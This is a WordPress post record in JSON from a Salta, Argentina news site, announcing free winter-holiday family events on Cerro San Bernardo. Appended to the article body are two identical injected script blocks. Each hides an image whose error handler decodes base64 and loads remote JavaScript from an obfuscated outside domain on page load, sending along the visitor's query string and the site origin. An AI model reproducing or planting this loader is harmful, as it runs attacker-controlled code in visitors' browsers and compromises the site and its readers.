{"id":4180,"date":"2024-07-10T13:41:56","date_gmt":"2024-07-10T16:41:56","guid":{"rendered":"https:\/\/circuitosalta.com.ar\/?p=4180"},"modified":"2025-08-13T23:53:08","modified_gmt":"2025-08-14T02:53:08","slug":"vacaciones-en-la-cima-actividades-recreativas-para-disfrutar-en-el-cerro-san-bernardo","status":"publish","type":"post","link":"https:\/\/circuitosalta.com.ar\/?p=4180","title":{"rendered":"\u00abVacaciones en la Cima\u00bb: actividades recreativas para disfrutar en el cerro San Bernardo"},"content":{"rendered":"\n<h4 class=\"wp-block-heading has-white-color has-text-color has-background has-link-color wp-elements-8d508a897814dbc2ca63298f7dcd0e38\" style=\"background-color:#950a2d\"><em>M\u00fasica, baile, juegos y diversi\u00f3n asegurada para vivir en familia durante el receso invernal. Todas las propuestas son libres y gratuitas.<\/em><\/h4>\n\n\n\n<p>El Telef\u00e9rico San Bernardo invita a disfrutar de diversas actividades recreativas, libres y gratuitas, con un calendario lleno de entretenimiento familiar para las vacaciones de invierno.<\/p>\n\n\n\n<p>Bandas de m\u00fasica, payasos, pe\u00f1as folcl\u00f3ricas, baile para ni\u00f1os y comparsas, se destacan entre las alternativas que se ofrecer\u00e1n durante el mes de julio en el mirador del Cerro San Bernardo.<\/p>\n\n\n\n<p>Mir\u00e1 el calendario completo y sumate a la diversi\u00f3n:<\/p>\n\n\n\n<p><strong>Jueves 11 &#8211; 16 hs<\/strong><\/p>\n\n\n\n<p>Payasos Papelito y Serpentina.&nbsp;<\/p>\n\n\n\n<p>Brindar\u00e1n animaci\u00f3n y entretenimiento para grandes y chicos con divertidos actos y juegos participativos.<\/p>\n\n\n\n<p><strong>Viernes 12 &#8211; 17 hs<\/strong><\/p>\n\n\n\n<p>Comparsa Los Incas.&nbsp;<\/p>\n\n\n\n<p>Colmar\u00e1n el mirador con ritmo y color ofreciendo una llamativa muestra de danzas tradicionales.<\/p>\n\n\n\n<p><strong>S\u00e1bado 13 &#8211; 16.30 hs<\/strong><\/p>\n\n\n\n<p>Pe\u00f1a La Panader\u00eda del Chu\u00f1a.&nbsp;<\/p>\n\n\n\n<p>Ofrece lo mejor del folclore local, con m\u00fasicos y bailarines que nos invitan a vivir una tradicional pe\u00f1a salte\u00f1a.<\/p>\n\n\n\n<p><strong>Lunes 15 &#8211; 16 hs<\/strong><\/p>\n\n\n\n<p>\u00abZumba Kids\u00bb.&nbsp;<\/p>\n\n\n\n<p>Brindar\u00e1 una clase de baile latino dise\u00f1ado especialmente para los m\u00e1s peque\u00f1os, promoviendo la actividad f\u00edsica de manera l\u00fadica.<\/p>\n\n\n\n<p><strong>Jueves 18 &#8211; 16 hs<\/strong><\/p>\n\n\n\n<p>Pe\u00f1a Boliche Balderrama.&nbsp;<\/p>\n\n\n\n<p>Ofrece lo mejor del folclore local, con m\u00fasicos y bailarines que nos invitan a vivir una tradicional pe\u00f1a salte\u00f1a.<\/p>\n\n\n\n<p><strong>Viernes 19 &#8211; 16 hs<\/strong><\/p>\n\n\n\n<p>\u00abJugamos Bailando\u00bb.&nbsp;<\/p>\n\n\n\n<p>Invita a disfrutar de juegos y actividades interactivas que combinan m\u00fasica y movimiento.<\/p>\n\n\n\n<p><strong>S\u00e1bado 20 &#8211; 17 hs<\/strong><\/p>\n\n\n\n<p>\u00abLa Vanguardia\u00bb&nbsp;<\/p>\n\n\n\n<p>La banda de covers interpretar\u00e1 los \u00e9xitos m\u00e1s populares, ofreciendo una propuesta distinta para toda la familia.<\/p>\n\n\n\n<p><strong>Mi\u00e9rcoles 24 &#8211; 12 hs<\/strong><\/p>\n\n\n\n<p>Banda de m\u00fasica municipal \u00ab25 de Mayo\u00bb.&nbsp;<\/p>\n\n\n\n<p>Brindar\u00e1n un concierto con un repertorio variado para todas las edades.<\/p>\n\n\n\n<p><strong>Jueves 25 &#8211; 17 hs<\/strong><\/p>\n\n\n\n<p>Comparsa Los Incas.&nbsp;<\/p>\n\n\n\n<p>Colmar\u00e1n el mirador con ritmo y color ofreciendo una llamativa muestra de danzas tradicionales.<\/p>\n\n\n\n<p><strong>Viernes 26 &#8211; 17 hs<\/strong><\/p>\n\n\n\n<p>\u00abLa Vanguardia\u00bb<\/p>\n\n\n\n<p>La banda de covers interpretar\u00e1 los \u00e9xitos m\u00e1s populares, ofreciendo una propuesta distinta para toda la familia.<\/p>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity\"\/>\n\n\n\n<p>Fuente:&nbsp;<strong>Secretaria de Prensa y Comunicaci\u00f3n<\/strong><\/p>\n<script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script><script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script>","protected":false},"excerpt":{"rendered":"<p>M\u00fasica, baile, juegos y diversi\u00f3n asegurada para vivir en familia durante el receso invernal. Todas las propuestas son libres y gratuitas. El Telef\u00e9rico San Bernardo invita a disfrutar de diversas actividades recreativas, libres y gratuitas, con un calendario lleno de entretenimiento familiar para las vacaciones de invierno. Bandas de m\u00fasica, payasos, pe\u00f1as folcl\u00f3ricas, baile para [&hellip;]<\/p>\n","protected":false},"author":2,"featured_media":4181,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"tdm_status":"","tdm_grid_status":"","footnotes":""},"categories":[14,17],"tags":[],"class_list":{"0":"post-4180","1":"post","2":"type-post","3":"status-publish","4":"format-standard","5":"has-post-thumbnail","7":"category-anuncios","8":"category-sociales"},"_links":{"self":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/4180"}],"collection":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=4180"}],"version-history":[{"count":3,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/4180\/revisions"}],"predecessor-version":[{"id":6746,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/4180\/revisions\/6746"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/media\/4181"}],"wp:attachment":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=4180"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=4180"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=4180"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}